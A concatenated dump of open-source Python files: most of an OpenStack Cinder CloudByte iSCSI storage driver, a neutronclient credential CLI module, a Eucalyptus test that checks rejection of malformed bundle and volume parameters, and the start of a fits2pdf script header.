self.get_volume_stats()
def _get_url(self, cmd, params, apikey):
"""Will prepare URL that connects to CloudByte."""
if params is None:
params = {}
params['command'] = cmd
params['response'] = 'json'
sanitized_params = {}
for key in params:
value = params[key]
if value is not None:
sanitized_params[key] = six.text_type(value)
sanitized_params = urllib.parse.urlencode(sanitized_params)
url = ('/client/api?%s' % sanitized_params)
LOG.debug("CloudByte URL to be executed: [%s].", url)
# Add the apikey
api = {}
api['apiKey'] = apikey
url = url + '&' + urllib.parse.urlencode(api)
return url
def _extract_http_error(self, error_data):
# Extract the error message from error_data
error_msg = ""
# error_data is a single key value dict
for key, value in error_data.items():
error_msg = value.get('errortext')
return error_msg
def _execute_and_get_response_details(self, host, url):
"""Will prepare response after executing an http request."""
res_details = {}
try:
# Prepare the connection
connection = http_client.HTTPSConnection(host)
# Make the connection
connection.request('GET', url)
# Extract the response as the connection was successful
response = connection.getresponse()
# Read the response
data = response.read()
# Transform the json string into a py object
data = json.loads(data)
# Extract http error msg if any
error_details = None
if response.status != 200:
error_details = self._extract_http_error(data)
# Prepare the return object
res_details['data'] = data
res_details['error'] = error_details
res_details['http_status'] = response.status
finally:
connection.close()
LOG.debug("CloudByte connection was closed successfully.")
return res_details
def _api_request_for_cloudbyte(self, cmd, params, version=None):
"""Make http calls to CloudByte."""
LOG.debug("Executing CloudByte API for command [%s].", cmd)
if version is None:
version = CloudByteISCSIDriver.VERSION
# Below is retrieved from /etc/cinder/cinder.conf
apikey = self.configuration.cb_apikey
if apikey is None:
msg = (_("API key is missing for CloudByte driver."))
raise exception.VolumeBackendAPIException(data=msg)
host = self.configuration.san_ip
# Construct the CloudByte URL with query params
url = self._get_url(cmd, params, apikey)
data = {}
error_details = None
http_status = None
try:
# Execute CloudByte API & frame the response
res_obj = self._execute_and_get_response_details(host, url)
data = res_obj['data']
error_details = res_obj['error']
http_status = res_obj['http_status']
except http_client.HTTPException as ex:
msg = (_("Error executing CloudByte API [%(cmd)s], "
"Error: %(err)s.") %
{'cmd': cmd, 'err': ex})
raise exception.VolumeBackendAPIException(data=msg)
# Check if it was an error response from CloudByte
if http_status != 200:
msg = (_("Failed to execute CloudByte API [%(cmd)s]."
" Http status: %(status)s,"
" Error: %(error)s.") %
{'cmd': cmd, 'status': http_status,
'error': error_details})
raise exception.VolumeBackendAPIException(data=msg)
LOG.info(_LI("CloudByte API executed successfully for command [%s]."),
cmd)
return data
def _request_tsm_details(self, account_id):
params = {"accountid": account_id}
# List all CloudByte tsm
data = self._api_request_for_cloudbyte("listTsm", params)
return data
def _override_params(self, default_dict, filtered_user_dict):
"""Override the default config values with user provided values."""
if filtered_user_dict is None:
# Nothing to override
return default_dict
for key, value in default_dict.items():
# Fill the user dict with default options based on condition
if filtered_user_dict.get(key) is None and value is not None:
filtered_user_dict[key] = value
return filtered_user_dict
def _add_qos_group_request(self, volume, tsmid, volume_name):
# Get qos related params from configuration
params = self.configuration.cb_add_qosgroup
if params is None:
params = {}
params['name'] = "QoS_" + volume_name
params['tsmid'] = tsmid
data = self._api_request_for_cloudbyte("addQosGroup", params)
return data
def _create_volume_request(self, volume, datasetid, qosgroupid,
tsmid, volume_name):
size = volume.get('size')
quotasize = six.text_type(size) + "G"
# Prepare the user input params
params = {
"datasetid": datasetid,
"name": volume_name,
"qosgroupid": qosgroupid,
"tsmid": tsmid,
"quotasize": quotasize
}
# Get the additional params from configuration
params = self._override_params(self.configuration.cb_create_volume,
params)
data = self._api_request_for_cloudbyte("createVolume", params)
return data
def _queryAsyncJobResult_request(self, jobid):
async_cmd = "queryAsyncJobResult"
params = {
"jobId": jobid,
}
data = self._api_request_for_cloudbyte(async_cmd, params)
return data
def _get_tsm_details(self, data, tsm_name, account_name):
# Filter required tsm's details
tsms = data['listTsmResponse'].get('listTsm')
if tsms is None:
msg = (_("TSM [%(tsm)s] was not found in CloudByte storage "
"for account [%(account)s].") %
{'tsm': tsm_name, 'account': account_name})
raise exception.VolumeBackendAPIException(data=msg)
tsmdetails = {}
for tsm in tsms:
if tsm['name'] == tsm_name:
tsmdetails['datasetid'] = tsm['datasetid']
tsmdetails['tsmid'] = tsm['id']
break
return tsmdetails
def _retry_volume_operation(self, operation, retries,
max_retries, jobid,
cb_volume):
"""CloudByte async calls via the FixedIntervalLoopingCall."""
# Query the CloudByte storage with this jobid
volume_response = self._queryAsyncJobResult_request(jobid)
count = retries['count']
result_res = None
if volume_response is not None:
result_res = volume_response.get('queryasyncjobresultresponse')
if result_res is None:
msg = (_(
"Null response received while querying "
"for [%(operation)s] based job [%(job)s] "
"at CloudByte storage.") %
{'operation': operation, 'job': jobid})
raise exception.VolumeBackendAPIException(data=msg)
status = result_res.get('jobstatus')
if status == 1:
LOG.info(_LI("CloudByte operation [%(operation)s] succeeded for "
"volume [%(cb_volume)s]."),
{'operation': operation, 'cb_volume': cb_volume})
raise loopingcall.LoopingCallDone()
elif count == max_retries:
# All attempts exhausted
LOG.error(_LE("CloudByte operation [%(operation)s] failed"
" for volume [%(vol)s]. Exhausted all"
" [%(max)s] attempts."),
{'operation': operation,
'vol': cb_volume,
'max': max_retries})
raise loopingcall.LoopingCallDone(retvalue=False)
else:
count += 1
retries['count'] = count
LOG.debug("CloudByte operation [%(operation)s] for"
" volume [%(vol)s]: retry [%(retry)s] of [%(max)s].",
{'operation': operation,
'vol': cb_volume,
'retry': count,
'max': max_retries})
def _wait_for_volume_creation(self, volume_response, cb_volume_name):
"""Given the job wait for it to complete."""
vol_res = volume_response.get('createvolumeresponse')
if vol_res is None:
msg = _("Null response received while creating volume [%s] "
"at CloudByte storage.") % cb_volume_name
raise exception.VolumeBackendAPIException(data=msg)
jobid = vol_res.get('jobid')
if jobid is None:
msg = _("Job id not found in CloudByte's "
"create volume [%s] response.") % cb_volume_name
raise exception.VolumeBackendAPIException(data=msg)
retry_interval = (
self.configuration.cb_confirm_volume_create_retry_interval)
max_retries = (
self.configuration.cb_confirm_volume_create_retries)
retries = {'count': 0}
timer = loopingcall.FixedIntervalLoopingCall(
self._retry_volume_operation,
'Create Volume',
retries,
max_retries,
jobid,
cb_volume_name)
timer.start(interval=retry_interval).wait()
def _wait_for_volume_deletion(self, volume_response, cb_volume_id):
"""Given the job wait for it to complete."""
vol_res = volume_response.get('deleteFileSystemResponse')
if vol_res is None:
msg = _("Null response received while deleting volume [%s] "
"at CloudByte storage.") % cb_volume_id
raise exception.VolumeBackendAPIException(data=msg)
jobid = vol_res.get('jobid')
if jobid is None:
msg = _("Job id not found in CloudByte's "
"delete volume [%s] response.") % cb_volume_id
raise exception.VolumeBackendAPIException(data=msg)
retry_interval = (
self.configuration.cb_confirm_volume_delete_retry_interval)
max_retries = (
self.configuration.cb_confirm_volume_delete_retries)
retries = {'count': 0}
timer = loopingcall.FixedIntervalLoopingCall(
self._retry_volume_operation,
'Delete Volume',
retries,
max_retries,
jobid,
cb_volume_id)
timer.start(interval=retry_interval).wait()
def _get_volume_id_from_response(self, cb_volumes, volume_name):
"""Search the volume in CloudByte storage."""
vol_res = cb_volumes.get('listFilesystemResponse')
if vol_res is None:
msg = _("Null response received from CloudByte's "
"list filesystem.")
raise exception.VolumeBackendAPIException(data=msg)
volumes = vol_res.get('filesystem')
if volumes is None:
msg = _('No volumes found in CloudByte storage.')
raise exception.VolumeBackendAPIException(data=msg)
volume_id = None
for vol in volumes:
if vol['name'] == volume_name:
volume_id = vol['id']
break
if volume_id is None:
msg = _("Volume [%s] not found in CloudByte "
"storage.") % volume_name
raise exception.VolumeBackendAPIException(data=msg)
return volume_id
def _get_qosgroupid_id_from_response(self, cb_volumes, volume_id):
volumes = cb_volumes['listFilesystemResponse']['filesystem']
qosgroup_id = None
for vol in volumes:
if vol['id'] == volume_id:
qosgroup_id = vol['groupid']
break
return qosgroup_id
def _build_provider_details_from_volume(self, volume, chap):
model_update = {}
model_update['provider_location'] = (
'%s %s %s' % (volume['ipaddress'] + ':3260', volume['iqnname'], 0)
)
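        # provider_location therefore takes the form (illustrative):
        #   '<ipaddress>:3260 <iqnname> 0'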
        # Set CHAP authentication details when CHAP is enabled for this driver
model_update['provider_auth'] = None
if chap:
model_update['provider_auth'] = ('CHAP %(username)s %(password)s'
% chap)
model_update['provider_id'] = volume['id']
LOG.debug("CloudByte volume iqn: [%(iqn)s] provider id: [%(proid)s].",
{'iqn': volume['iqnname'], 'proid': volume['id']})
return model_update
def _build_provider_details_from_response(self,
cb_volumes,
volume_name,
chap):
"""Get provider information."""
model_update = {}
volumes = cb_volumes['listFilesystemResponse']['filesystem']
for vol in volumes:
if vol['name'] == volume_name:
model_update = self._build_provider_details_from_volume(vol,
chap)
break
return model_update
def _get_initiator_group_id_from_response(self, data):
"""Find iSCSI initiator group id."""
ig_list_res = data.get('listInitiatorsResponse')
if ig_list_res is None:
msg = _("Null response received from CloudByte's "
"list iscsi initiators.")
raise exception.VolumeBackendAPIException(data=msg)
ig_list = ig_list_res.get('initiator')
if ig_list is None:
msg = _('No iscsi initiators were found in CloudByte.')
raise exception.VolumeBackendAPIException(data=msg)
ig_id = None
for ig in ig_list:
if ig.get('initiatorgroup') == 'ALL':
ig_id = ig['id']
break
return ig_id
def _get_iscsi_service_id_from_response(self, volume_id, data):
iscsi_service_res = data.get('listVolumeiSCSIServiceResponse')
if iscsi_service_res is None:
msg = _("Null response received from CloudByte's "
"list volume iscsi service.")
raise exception.VolumeBackendAPIException(data=msg)
iscsi_service_list = iscsi_service_res.get('iSCSIService')
if iscsi_service_list is None:
msg = _('No iscsi services found in CloudByte storage.')
raise exception.VolumeBackendAPIException(data=msg)
iscsi_id = None
for iscsi_service in iscsi_service_list:
if iscsi_service['volume_id'] == volume_id:
iscsi_id = iscsi_service['id']
break
if iscsi_id is None:
msg = _("No iscsi service found for CloudByte "
"volume [%s].") % volume_id
raise exception.VolumeBackendAPIException(data=msg)
else:
return iscsi_id
def _request_update_iscsi_service(self, iscsi_id, ig_id, ag_id):
params = {
"id": iscsi_id,
"igid": ig_id
}
if ag_id:
params['authgroupid'] = ag_id
params['authmethod'] = "CHAP"
self._api_request_for_cloudbyte(
'updateVolumeiSCSIService', params)
def _get_cb_snapshot_path(self, snapshot_name, volume_id):
"""Find CloudByte snapshot path."""
params = {"id": volume_id}
# List all snapshot from CloudByte
cb_snapshots_list = self._api_request_for_cloudbyte(
'listStorageSnapshots', params)
# Filter required snapshot from list
cb_snap_res = cb_snapshots_list.get('listDatasetSnapshotsResponse')
cb_snapshot = {}
if cb_snap_res is not None:
cb_snapshot = cb_snap_res.get('snapshot')
path = None
# Filter snapshot path
for snap in cb_snapshot:
if snap['name'] == snapshot_name:
path = snap['path']
break
return path
def _get_account_id_from_name(self, account_name):
params = {}
data = self._api_request_for_cloudbyte("listAccount", params)
accounts = data["listAccountResponse"]["account"]
account_id = None
for account in accounts:
if account.get("name") == account_name:
account_id = account.get("id")
break
if account_id is None:
msg = _("Failed to get CloudByte account details "
"for account [%s].") % account_name
raise exception.VolumeBackendAPIException(data=msg)
return account_id
def _search_volume_id(self, cb_volumes, cb_volume_id):
"""Search the volume in CloudByte."""
volumes_res = cb_volumes.get('listFilesystemResponse')
if volumes_res is None:
msg = _("No response was received from CloudByte's "
"list filesystem api call.")
raise exception.VolumeBackendAPIException(data=msg)
volumes = volumes_res.get('filesystem')
if volumes is None:
msg = _("No volume was found at CloudByte storage.")
raise exception.VolumeBackendAPIException(data=msg)
volume_id = None
for vol in volumes:
if vol['id'] == cb_volume_id:
volume_id = vol['id']
break
return volume_id
def _get_storage_info(self, tsmname):
"""Get CloudByte TSM that is associated with OpenStack backend."""
# List all TSMs from CloudByte storage
tsm_list = self._api_request_for_cloudbyte('listTsm', params={})
tsm_details_res = tsm_list.get('listTsmResponse')
if tsm_details_res is None:
msg = _("No response was received from CloudByte storage "
"list tsm API call.")
raise exception.VolumeBackendAPIException(data=msg)
tsm_details = tsm_details_res.get('listTsm')
data = {}
flag = 0
# Filter required TSM and get storage info
for tsms in tsm_details:
if tsms['name'] == tsmname:
flag = 1
data['total_capacity_gb'] = (
float(tsms['numericquota']) / units.Ki)
data['free_capacity_gb'] = (
float(tsms['availablequota']) / units.Ki)
break
# TSM not found in CloudByte storage
if flag == 0:
LOG.error(_LE("TSM [%s] not found in CloudByte storage."), tsmname)
data['total_capacity_gb'] = 0.0
data['free_capacity_gb'] = 0.0
return data
def _get_auth_group_id_from_response(self, data):
"""Find iSCSI auth group id."""
chap_group = self.configuration.cb_auth_group
ag_list_res = data.get('listiSCSIAuthGroupResponse')
if ag_list_res is None:
msg = _("Null response received from CloudByte's "
"list iscsi auth groups.")
raise exception.VolumeBackendAPIException(data=msg)
ag_list = ag_list_res.get('authgroup')
if ag_list is None:
msg = _('No iscsi auth groups were found in CloudByte.')
raise exception.VolumeBackendAPIException(data=msg)
ag_id = None
for ag in ag_list:
if ag.get('name') == chap_group:
ag_id = ag['id']
break
else:
msg = _("Auth group [%s] details not found in "
"CloudByte storage.") % chap_group
raise exception.VolumeBackendAPIException(data=msg)
return ag_id
def _get_auth_group_info(self, account_id, ag_id):
"""Fetch the auth group details."""
params = {"accountid": account_id, "authgroupid": ag_id}
auth_users = self._api_request_for_cloudbyte(
'listiSCSIAuthUser', params)
auth_user_details_res = auth_users.get('listiSCSIAuthUsersResponse')
if auth_user_details_res is None:
msg = _("No response was received from CloudByte storage "
"list iSCSI auth user API call.")
raise exception.VolumeBackendAPIException(data=msg)
auth_user_details = auth_user_details_res.get('authuser')
if auth_user_details is None:
msg = _("Auth user details not found in CloudByte storage.")
raise exception.VolumeBackendAPIException(data=msg)
chapuser = auth_user_details[0].get('chapusername')
chappassword = auth_user_details[0].get('chappassword')
if chapuser is None or chappassword is None:
msg = _("Invalid chap user details found in CloudByte storage.")
raise exception.VolumeBackendAPIException(data=msg)
data = {'username': chapuser, 'password': chappassword, 'ag_id': ag_id}
return data
def _get_chap_info(self, account_id):
"""Fetch the chap details."""
params = {"accountid": account_id}
iscsi_auth_data = self._api_request_for_cloudbyte(
'listiSCSIAuthGroup', params)
ag_id = self._get_auth_group_id_from_response(
iscsi_auth_data)
return self._get_auth_group_info(account_id, ag_id)
def _export(self):
model_update = {'provider_auth': None}
if self.cb_use_chap is True:
account_name = self.configuration.cb_account_name
account_id = self._get_account_id_from_name(account_name)
chap = self._get_chap_info(account_id)
model_update['provider_auth'] = ('CHAP %(username)s %(password)s'
% chap)
return model_update
def create_volume(self, volume):
tsm_name = self.configuration.cb_tsm_name
account_name = self.configuration.cb_account_name
# Get account id of this account
account_id = self._get_account_id_from_name(account_name)
# Set backend storage volume name using OpenStack volume id
cb_volume_name = volume['id'].replace("-", "")
LOG.debug("Will create a volume [%(cb_vol)s] in TSM [%(tsm)s] "
"at CloudByte storage w.r.t "
"OpenStack volume [%(stack_vol)s].",
{'cb_vol': cb_volume_name,
'stack_vol': volume.get('id'),
'tsm': tsm_name})
tsm_data = self._request_tsm_details(account_id)
tsm_details = self._get_tsm_details(tsm_data, tsm_name, account_name)
# Send request to create a qos group before creating a volume
LOG.debug("Creating qos group for CloudByte volume [%s].",
cb_volume_name)
qos_data = self._add_qos_group_request(
volume, tsm_details.get('tsmid'), cb_volume_name)
# Extract the qos group id from response
qosgroupid = qos_data['addqosgroupresponse']['qosgroup']['id']
LOG.debug("Successfully created qos group for CloudByte volume [%s].",
cb_volume_name)
# Send a create volume request to CloudByte API
vol_data = self._create_volume_request(
volume, tsm_details.get('datasetid'), qosgroupid,
tsm_details.get('tsmid'), cb_volume_name)
# Since create volume is an async call;
# need to confirm the creation before proceeding further
self._wait_for_volume_creation(vol_data, cb_volume_name)
# Fetch iscsi id
cb_volumes = self._api_request_for_cloudbyte(
'listFileSystem', params={})
volume_id = self._get_volume_id_from_response(cb_volumes,
cb_volume_name)
params = {"storageid": volume_id}
iscsi_service_data = self._api_request_for_cloudbyte(
'listVolumeiSCSIService', params)
iscsi_id = self._get_iscsi_service_id_from_response(
volume_id, iscsi_service_data)
# Fetch the initiator group ID
params = {"accountid": account_id}
iscsi_initiator_data = self._api_request_for_cloudbyte(
'listiSCSIInitiator', params)
ig_id = self._get_initiator_group_id_from_response(
iscsi_initiator_data)
LOG.debug("Updating iscsi service for CloudByte volume [%s].",
cb_volume_name)
ag_id = None
chap_info = {}
if self.cb_use_chap is True:
chap_info = self._get_chap_info(account_id)
ag_id = chap_info['ag_id']
# Update the iscsi service with above fetched iscsi_id & ig_id
self._request_update_iscsi_service(iscsi_id, ig_id, ag_id)
LOG.debug("CloudByte volume [%(vol)s] updated with "
"iscsi id [%(iscsi)s] and initiator group [%(ig)s] and "
"authentication group [%(ag)s].",
{'vol': cb_volume_name, 'iscsi': iscsi_id,
'ig': ig_id, 'ag': ag_id})
# Provide the model after successful completion of above steps
provider = self._build_provider_details_from_response(
cb_volumes, cb_volume_name, chap_info)
LOG.info(_LI("Successfully created a CloudByte volume [%(cb_vol)s] "
"w.r.t OpenStack volume [%(stack_vol)s]."),
{'cb_vol': cb_volume_name, 'stack_vol': volume.get('id')})
return provider
def delete_volume(self, volume):
params = {}
# OpenStack source volume id
source_volume_id = volume['id']
# CloudByte volume id equals OpenStack volume's provider_id
cb_volume_id = volume.get('provider_id')
LOG.debug("Will delete CloudByte volume [%(cb_vol)s] "
"w.r.t OpenStack volume [%(stack_vol)s].",
{'cb_vol': cb_volume_id, 'stack_vol': source_volume_id})
# Delete volume at CloudByte
if cb_volume_id is not None:
cb_volumes = self._api_request_for_cloudbyte(
'listFileSystem', params)
# Search cb_volume_id in CloudByte volumes
            # in case it has already been deleted from CloudByte
cb_volume_id = self._search_volume_id(cb_volumes, cb_volume_id)
# Delete volume at CloudByte
if cb_volume_id is not None:
params = {"id": cb_volume_id}
del_res = self._api_request_for_cloudbyte('deleteFileSystem',
params)
self._wait_for_volume_deletion(del_res, cb_volume_id)
LOG.info(
_LI("Successfully deleted volume [%(cb_vol)s] "
"at CloudByte corresponding to "
"OpenStack volume [%(stack_vol)s]."),
{'cb_vol': cb_volume_id,
'stack_vol': source_volume_id})
else:
LOG.error(_LE("CloudByte does not have a volume corresponding "
"to OpenStack volume [%s]."), source_volume_id)
else:
LOG.error(_LE("CloudByte volume information not available for"
" OpenStack volume [%s]."), source_volume_id)
def create_snapshot(self, snapshot):
"""Creates a snapshot at CloudByte."""
# OpenStack volume
source_volume_id = snapshot['volume_id']
# CloudByte volume id equals OpenStack volume's provider_id
cb_volume_id = snapshot.get('volume').get('provider_id')
if cb_volume_id is not None:
# Set backend storage snapshot name using OpenStack snapshot id
snapshot_name = "snap_" + snapshot['id'].replace("-", "")
params = {
"name": snapshot_name,
"id": cb_volume_id
}
LOG.debug(
"Will create CloudByte snapshot [%(cb_snap)s] "
"w.r.t CloudByte volume [%(cb_vol)s] "
"and OpenStack volume [%(stack_vol)s].",
{'cb_snap': snapshot_name,
'cb_vol': cb_volume_id,
'stack_vol': source_volume_id})
self._api_request_for_cloudbyte('createStorageSnapshot', params)
# Get the snapshot path from CloudByte
path = self._get_cb_snapshot_path(snapshot_name, cb_volume_id)
LOG.info(
_LI("Created CloudByte snapshot [%(cb_snap)s] "
"w.r.t CloudByte volume [%(cb_vol)s] "
"and OpenStack volume [%(stack_vol)s]."),
{'cb_snap': path,
'cb_vol': cb_volume_id,
'stack_vol': source_volume_id})
model_update = {}
# Store snapshot path as snapshot provider_id
model_update['provider_id'] = path
else:
msg = _("Failed to create snapshot. CloudByte volume information "
"not found for OpenStack volume [%s].") % source_volume_id
raise exception.VolumeBackendAPIException(data=msg)
return model_update
def create_cloned_volume(self, cloned_volume, src_volume):
"""Create a clone of an existing volume.
First it will create a snapshot of the source/parent volume,
then it creates a clone of this newly created snapshot.
"""
# Extract necessary information from input params
parent_volume_id = src_volume.get('id')
# Generating id for snapshot
# as this is not user entered in this particular usecase
snapshot_id = six.text_type(uuid.uuid1())
# Prepare the params for create_snapshot
# as well as create_volume_from_snapshot method
snapshot_params = {
'id': snapshot_id,
'volume_id': parent_volume_id,
'volume': src_volume,
}
# Create a snapshot
snapshot = self.create_snapshot(snapshot_params)
snapshot_params['provider_id'] = snapshot.get('provider_id')
# Create a clone of above snapshot
return self.create_volume_from_snapshot(cloned_volume, snapshot_params)
def create_volume_from_snapshot(self, cloned_volume, snapshot):
"""Create a clone from an existing snapshot."""
# Getting necessary data from input params
parent_volume_id = snapshot['volume_id']
cloned_volume_name = cloned_volume['id'].replace("-", "")
# CloudByte volume id equals OpenStack volume's provider_id
cb_volume_id = snapshot.get('volume').get('provider_id')
# CloudByte snapshot path equals OpenStack snapshot's provider_id
cb_snapshot_path = snapshot['provider_id']
params = {
"id": cb_volume_id,
"clonename": cloned_volume_name,
"path": cb_snapshot_path
}
LOG.debug(
"Will create CloudByte clone [%(cb_clone)s] "
"at CloudByte snapshot path [%(cb_snap)s] "
"w.r.t parent OpenStack volume [%(stack_vol)s].",
{'cb_clone': cloned_volume_name,
'cb_snap': cb_snapshot_path,
'stack_vol': parent_volume_id})
# Create clone of the snapshot
clone_dataset_snapshot_res = (
self._api_request_for_cloudbyte('cloneDatasetSnapshot', params))
cb_snap = clone_dataset_snapshot_res.get('cloneDatasetSnapshot')
cb_vol = {}
if cb_snap is not None:
cb_vol = cb_snap.get('filesystem')
else:
msg = ("Error: Clone creation failed for "
"OpenStack volume [%(vol)s] with CloudByte "
"snapshot path [%(path)s]" %
{'vol': parent_volume_id, 'path': cb_snapshot_path})
raise exception.VolumeBackendAPIException(data=msg)
LOG.info(
_LI("Created a clone [%(cb_clone)s] "
"at CloudByte snapshot path [%(cb_snap)s] "
"w.r.t parent OpenStack volume [%(stack_vol)s]."),
{'cb_clone': cloned_volume_name,
'cb_snap': cb_snapshot_path,
'stack_vol': parent_volume_id})
chap_info = {}
if self.cb_use_chap is True:
account_name = self.configuration.cb_account_name
# Get account id of this account
account_id = self._get_account_id_from_name(account_name)
chap_info = self._get_chap_info(account_id)
model_update = self._build_provider_details_from_volume(cb_vol,
chap_info)
return model_update
def delete_snapshot(self, snapshot):
"""Delete a snapshot at CloudByte."""
# Find volume id
source_volume_id = snapshot['volume_id']
# CloudByte volume id equals OpenStack volume's provider_id
cb_volume_id = snapshot.get('volume').get('provider_id')
# CloudByte snapshot path equals OpenStack snapshot's provider_id
cb_snapshot_path = snapshot['provider_id']
# If cb_snapshot_path is 'None'
# then no need to execute CloudByte API
if cb_snapshot_path is not None:
params = {
"id": cb_volume_id,
"path": cb_snapshot_path
}
LOG.debug("Will delete CloudByte snapshot [%(snap)s] w.r.t "
"parent CloudByte volume [%(cb_vol)s] "
"and parent OpenStack volume [%(stack_vol)s].",
{'snap': cb_snapshot_path,
'cb_vol': cb_volume_id,
'stack_vol': source_volume_id})
# Execute CloudByte API
self._api_request_for_cloudbyte('deleteSnapshot', params)
LOG.info(
_LI("Deleted CloudByte snapshot [%(snap)s] w.r.t "
"parent CloudByte volume [%(cb_vol)s] "
"and parent OpenStack volume [%(stack_vol)s]."),
{'snap': cb_snapshot_path,
'cb_vol': cb_volume_id,
'stack_vol': source_volume_id})
else:
LOG.error(_LE("CloudByte snapshot information is not available"
" for OpenStack volume [%s]."), source_volume_id)
def extend_volume(self, volume, new_size):
# CloudByte volume id equals OpenStack volume's provider_id
cb_volume_id = volume.get('provider_id')
params = {
"id": cb_volume_id,
"quotasize": six.text_type(new_size) + 'G'
}
# Request the CloudByte api to update the volume
self._api_request_for_cloudbyte('updateFileSystem', params)
def create_export(self, context, volume, connector):
"""Setup the iscsi export info."""
return self._export()
def ensure_export(self, context, volume):
"""Verify the iscsi export info."""
return self._export()
def get_volume_stats(self, refresh=False):
"""Get volume statistics.
If 'refresh' is True, update/refresh the statistics first.
"""
if refresh:
# Get the TSM name from configuration
tsm_name = self.configuration.cb_tsm_name
# Get the storage details of this TSM
data = self._get_storage_info(tsm_name)
data["volume_backend_name"] = (
self.configuration.safe_get('volume_backend_name') or
'CloudByte')
data["vendor_name"] = 'CloudByte'
data['reserved_percentage'] = 0
data["driver_version"] = CloudByteISCSIDriver.VERSION
data["storage_protocol"] = 'iSCSI'
LOG.debug("CloudByte driver stats: [%s].", data)
# Set this to the instance variable
self.volume_stats = data
return self.volume_stats
| nikesh-mahalka/cinder | cinder/volume/drivers/cloudbyte/cloudbyte.py | Python | apache-2.0 | 38,259 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import logging
from neutronclient.neutron import v2_0 as neutronV20
class ListCredential(neutronV20.ListCommand):
"""List credentials that belong to a given tenant."""
resource = 'credential'
log = logging.getLogger(__name__ + '.ListCredential')
_formatters = {}
list_columns = ['credential_id', 'credential_name', 'user_name',
'password', 'type']
class ShowCredential(neutronV20.ShowCommand):
"""Show information of a given credential."""
resource = 'credential'
log = logging.getLogger(__name__ + '.ShowCredential')
allow_names = False
class CreateCredential(neutronV20.CreateCommand):
"""Creates a credential."""
resource = 'credential'
log = logging.getLogger(__name__ + '.CreateCredential')
def add_known_arguments(self, parser):
parser.add_argument(
'credential_name',
help='Name/Ip address for Credential')
parser.add_argument(
'credential_type',
help='Type of the Credential')
parser.add_argument(
'--username',
help='Username for the credential')
parser.add_argument(
'--password',
help='Password for the credential')
def args2body(self, parsed_args):
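        # Builds the request body, e.g. (illustrative values):
        #   {'credential': {'credential_name': '10.0.0.1', 'type': 'password',
        #                   'user_name': 'admin', 'password': 'secret'}}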
body = {'credential': {
'credential_name': parsed_args.credential_name}}
if parsed_args.credential_type:
body['credential'].update({'type':
parsed_args.credential_type})
if parsed_args.username:
body['credential'].update({'user_name':
parsed_args.username})
if parsed_args.password:
body['credential'].update({'password':
parsed_args.password})
return body
class DeleteCredential(neutronV20.DeleteCommand):
"""Delete a given credential."""
log = logging.getLogger(__name__ + '.DeleteCredential')
resource = 'credential'
allow_names = False
| vichoward/python-neutronclient | neutronclient/neutron/v2_0/credential.py | Python | apache-2.0 | 2,705 |
'''
Created on = '10/1/13'
Author = 'mmunn'
Unit test : EUCA-7710 missing input validation on CLC
setUp : Install Credentials, starts instance
 test : run euca-bundle-instance, euca-attach-volume and euca-detach-volume with bad input parameters
for bucket,prefix and device
tearDown : Removes Credentials, terminates instance
cloud.conf:( place in same directory as this test)
IP ADDRESS CENTOS 6.3 64 BZR [CC00 CLC SC00 WS]
IP ADDRESS CENTOS 6.3 64 BZR [NC00]
'''
import unittest
import shutil
from eucaops import Eucaops
class Euca7710(unittest.TestCase):
def setUp(self):
self.OK = '\033[1m\033[37m\033[42m'
self.ENDC = '\033[0m'
self.conf = 'cloud.conf'
self.tester = Eucaops( config_file=self.conf, password='foobar' )
self.source = 'source ' + self.tester.credpath + '/eucarc && '
self.clc1 = self.tester.service_manager.get_enabled_clc()
self.doAuth()
def doAuth(self):
self.keypair = self.tester.add_keypair()
self.group = self.tester.add_group()
self.tester.authorize_group(self.group)
self.tester.authorize_group(self.group, port=3389, protocol='tcp')
self.skey = self.tester.get_secret_key()
self.akey = self.tester.get_access_key()
def runInstances(self, numMax):
#Start instance
self.reservation = self.tester.run_instance(self.emi,type='m1.large', keypair=self.keypair.name, group=self.group, min=1, max=numMax, is_reachable=False)
# Make sure the instance is running
for instance in self.reservation.instances:
if instance.state == 'running':
self.instance = instance
self.instanceid = instance.id
    def runCmdTest(self, cmd):
        self.out = self.clc1.machine.cmd(self.source + cmd)
print self.OK + self.out['output'] + self.ENDC
# make sure InvalidParameterValue error was thrown
assert str(self.out).count('InvalidParameterValue') > 0
def test(self):
self.emi = self.tester.get_emi()
self.runInstances(1)
# Attempt to bundle the running instance with invalid parameters
# regex used to validate bucket and prefix parameters = ( ^[a-zA-Z\d\.\-_]{3,255}$ )
# two few chars
self.badBucket = 'xx'
# invalid char
self.badPrefix = 'xx$'
self.cmd = 'euca-bundle-instance ' + self.instanceid + ' -b ' + self.badBucket + ' -p goodPrefix -o ' + self.akey + ' -w ' + self.skey
self.runCmdTest(self.cmd)
self.cmd = 'euca-bundle-instance ' + self.instanceid + ' -b goodBucket -p ' + self.badPrefix + ' -o ' + self.akey + ' -w ' + self.skey
self.runCmdTest(self.cmd)
# Attempt to attach and detach volume with invalid device name
# regex used to device parameter = ( ^[a-zA-Z\d/]{3,10}$ )
self.volume = 'vol-BOGUS1'
# invalid char
self.badDevice1 = 'sd$'
# invalid name too long
self.badDevice2 = 'sdistoolong'
        self.cmd = 'euca-attach-volume -i ' + self.instanceid + ' -d ' + self.badDevice1 + ' ' + self.volume
        self.runCmdTest(self.cmd)
        self.cmd = 'euca-attach-volume -i ' + self.instanceid + ' -d ' + self.badDevice2 + ' ' + self.volume
        self.runCmdTest(self.cmd)
        self.cmd = 'euca-detach-volume -i ' + self.instanceid + ' -d ' + self.badDevice1 + ' ' + self.volume
        self.runCmdTest(self.cmd)
        self.cmd = 'euca-detach-volume -i ' + self.instanceid + ' -d ' + self.badDevice2 + ' ' + self.volume
        self.runCmdTest(self.cmd)
def tearDown(self):
if self.reservation is not None:
self.tester.terminate_instances(self.reservation)
self.tester.delete_keypair(self.keypair)
self.tester.local('rm ' + self.keypair.name + '.pem')
shutil.rmtree(self.tester.credpath)
if __name__ == '__main__':
unittest.main() | nagyistoce/eutester | testcases/cloud_admin/3-4/Euca7710.py | Python | bsd-2-clause | 4,008 |
#! /usr/bin/env python
#
# fits2pdf.py -- Image a FITS file as a PDF.
#
# Eric Jeschke ([email protected])
#
